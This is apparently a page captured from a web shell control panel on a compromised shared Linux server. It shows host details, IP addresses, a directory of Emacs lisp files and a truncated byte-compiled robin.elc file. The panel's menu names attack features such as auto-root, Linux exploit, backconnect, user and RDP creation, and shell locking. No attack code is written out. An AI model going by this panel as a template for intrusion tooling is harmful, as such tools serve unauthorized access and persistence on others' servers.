Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
emacs /
27.1 /
lisp /
international /
[ HOME SHELL ]
Name
Size
Permission
Action
ccl.elc
40.24
KB
-rw-r--r--
characters.elc
32.4
KB
-rw-r--r--
charprop.el
5.33
KB
-rw-r--r--
charscript.elc
6.36
KB
-rw-r--r--
cp51932.elc
7.77
KB
-rw-r--r--
eucjp-ms.elc
31
KB
-rw-r--r--
fontset.elc
33.93
KB
-rw-r--r--
isearch-x.elc
2.8
KB
-rw-r--r--
iso-ascii.elc
5.67
KB
-rw-r--r--
iso-cvt.elc
18.49
KB
-rw-r--r--
iso-transl.elc
4.96
KB
-rw-r--r--
ja-dic-cnv.elc
11.51
KB
-rw-r--r--
ja-dic-utl.elc
5.11
KB
-rw-r--r--
kinsoku.elc
3.11
KB
-rw-r--r--
kkc.elc
14.3
KB
-rw-r--r--
latexenc.elc
4.14
KB
-rw-r--r--
latin1-disp.elc
43.78
KB
-rw-r--r--
mule-cmds.elc
90.54
KB
-rw-r--r--
mule-conf.elc
37.85
KB
-rw-r--r--
mule-diag.elc
36.73
KB
-rw-r--r--
mule-util.elc
13.94
KB
-rw-r--r--
mule.elc
78.19
KB
-rw-r--r--
ogonek.elc
16.26
KB
-rw-r--r--
quail.elc
80.29
KB
-rw-r--r--
rfc1843.elc
3.84
KB
-rw-r--r--
robin.elc
8.36
KB
-rw-r--r--
titdic-cnv.elc
34.82
KB
-rw-r--r--
ucs-normalize.elc
209.65
KB
-rw-r--r--
uni-bidi.el
10.79
KB
-rw-r--r--
uni-brackets.el
5.02
KB
-rw-r--r--
uni-category.el
16.28
KB
-rw-r--r--
uni-combining.el
8.56
KB
-rw-r--r--
uni-comment.el
2.67
KB
-rw-r--r--
uni-decimal.el
3.37
KB
-rw-r--r--
uni-decomposition.el
29.4
KB
-rw-r--r--
uni-digit.el
3.6
KB
-rw-r--r--
uni-lowercase.el
8.12
KB
-rw-r--r--
uni-mirrored.el
11.22
KB
-rw-r--r--
uni-name.el
220.76
KB
-rw-r--r--
uni-numeric.el
5.88
KB
-rw-r--r--
uni-old-name.el
19.63
KB
-rw-r--r--
uni-special-lowercase.el
2
KB
-rw-r--r--
uni-special-titlecase.el
6.48
KB
-rw-r--r--
uni-special-uppercase.el
6.68
KB
-rw-r--r--
uni-titlecase.el
8.22
KB
-rw-r--r--
uni-uppercase.el
8.22
KB
-rw-r--r--
utf-7.elc
2.14
KB
-rw-r--r--
utf7.elc
5.69
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : robin.elc
;ELC ;;; Compiled ;;; in Emacs version 27.1 ;;; with all optimizations. ;;; This file uses dynamic docstrings, first added in Emacs 19.29. ;;; This file does not contain utf-8 non-ASCII characters, ;;; and so can be loaded in Emacs versions earlier than 23. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; #@661 List of robin packages. A robin package is of the form (NAME DOCSTRING &rest RULES). NAME is a string specifying a particular robin package. DOCSTRING is a documentation string for the robin package. RULE is of the form (KEY OUTPUT &rest rules). KEY is a string. OUTPUT is a character or a string. For example, if you evaluate the following, (robin-define-package "test" "Uppercase input characters" ("a" "A") ("ab" "AB") ("ac" "AC") ("acd" "ACD") ("ace" "ACE") ("b" "B")) this robin package will be the following. ("test" "Uppercase input characters" (?a "A" (?b "AB") (?c "AC" (?d "ACD") (?e "ACE"))) (?b "B")) (defvar robin-package-alist nil (#$ . 409)) #@360 Define a robin package. NAME is the string of this robin package. DOCSTRING is the documentation string of this robin package. Each RULE is of the form (INPUT OUTPUT) where INPUT is a string and OUTPUT is either a character or a string. RULES are not evaluated. If there already exists a robin package whose name is NAME, the new one replaces the old one. (defalias 'robin-define-package '(macro . #[(name docstring &rest rules) "\306!\307D\310\211\211\310\211\203^ @\211@A@\311\f\n$\210;\204; \312\313\"\210\202U \314\n!\203J \nB B\202U \n;\204U \312\315\"\210A\211\204 *\fA\240\210\316\317\320\321BBD\322\323\fDD\324\323 DD\325\323 DDF-\326BB\207" [name pairs output input new iname intern "" nil robin-add-rule error "Bad input sequence %S" characterp "Bad output pattern %S" let slot assoc (robin-package-alist) newdef quote prop lst ((if slot (setcdr slot (cdr newdef)) (setq robin-package-alist (cons newdef robin-package-alist))) (dolist (l lst) (put-char-code-property (cdr l) prop (car l)))) rules r --dolist-tail-- docstring] 8 (#$ . 1120)])) #@210 Change a rule in an already defined robin package. NAME is the string specifying a robin package. INPUT is a string that specifies the input pattern. OUTPUT is either a character or a string to be generated. (defalias 'robin-modify-package #[(name input output) "\306 \"\307\211\204 \310\311!\210\2025 A@A\312\240\210\313\f $\210A\n\240\210\314 !\2035 \315 \316!\f#\210* \207" [name robin-package-alist docstring tree input output assoc nil error "No such robin package" "" robin-add-rule characterp put-char-code-property intern] 6 (#$ . 2221)]) #@84 Add translation rule (INPUT OUTPUT) to TREE whose name is NAME. Internal use only. (defalias 'robin-add-rule #[(name tree input output) "\306H\307 \n\"\nA@G\310U\203* \203 A \240\202Q \311\n! DC\241\202Q \204G \312\f!\2038 \313\f! \f\313 !PD\311\n!C\241\210\314\315\310\" $+\207" [input head tree branch sofar output 0 assoc 1 last characterp char-to-string robin-add-rule substring name] 6 (#$ . 2786)]) #@45 If non-nil, `robin-input-method' is active. (defvar robin-mode nil (#$ . 3214)) (make-variable-buffer-local 'robin-mode) #@102 String representing the name of the current robin package. A nil value means no package is selected. (defvar robin-current-package-name nil (#$ . 3342)) (make-variable-buffer-local 'robin-current-package-name) #@52 Start using robin package NAME, which is a string. (defalias 'robin-use-package #[(name) "\304 \"\211\204 \305\306!\210\307 )\207" [name robin-package-alist package robin-current-package-name assoc error "No such robin package" robin-activate] 4 (#$ . 3558)]) #@32 Deactivate robin input method. (defalias 'robin-deactivate #[nil "\300\301!\207" [robin-activate -1] 2 (#$ . 3829) nil]) (byte-code "\300\301\302\303#\210\304\301\302\305#\207" [defalias robin-inactivate robin-deactivate nil make-obsolete "24.3"] 4) #@221 Activate robin input method. With ARG, activate robin input method if and only if ARG is positive. While this input method is active, the variable `input-method-function' is bound to the function `robin-input-method'. (defalias 'robin-activate #[(&optional arg) "\203 \305!\306W\203 \307\216\310\211\311\312!)\207\313\314\315\316 \317 =\203* \320\321\322\"\210\311\323\324\"\210\325\304!\210\326\211\207" [arg robin-mode describe-current-input-method-function deactivate-current-input-method-function input-method-function prefix-numeric-value 0 #[nil "\300\301!\207" [kill-local-variable input-method-function] 2] nil run-hooks robin-deactivate-hook t robin-help robin-deactivate selected-window minibuffer-window add-hook minibuffer-exit-hook robin-exit-from-minibuffer input-method-activate-hook robin-activate-hook make-local-variable robin-input-method] 4 (#$ . 4086)]) (byte-code "\302\303\304\305#\210\306\305\211\203, @\303N\203% \304N\204% \307\304\303N#\210 A\211\204 *\310\303\304\311#\207" [prop --dolist-tail-- defvaralias robin-inactivate-hook robin-deactivate-hook nil (saved-value saved-variable-comment) put make-obsolete-variable "24.3"] 6) (defalias 'robin-exit-from-minibuffer #[nil "\300 \210\301 \302X\205 \303\304\305\"\207" [deactivate-input-method minibuffer-depth 1 remove-hook minibuffer-exit-hook robin-exit-from-minibuffer] 3]) #@54 Interpret typed key sequence and insert into buffer. (defalias 'robin-input-method #[(key) "\204\f \204\f \n\203 C\207\306\307`\310\f \"AA\307\211\f \236\211\f\203U `|\210\fA@\211c\210\fAA\211 \203O \311 \211\202'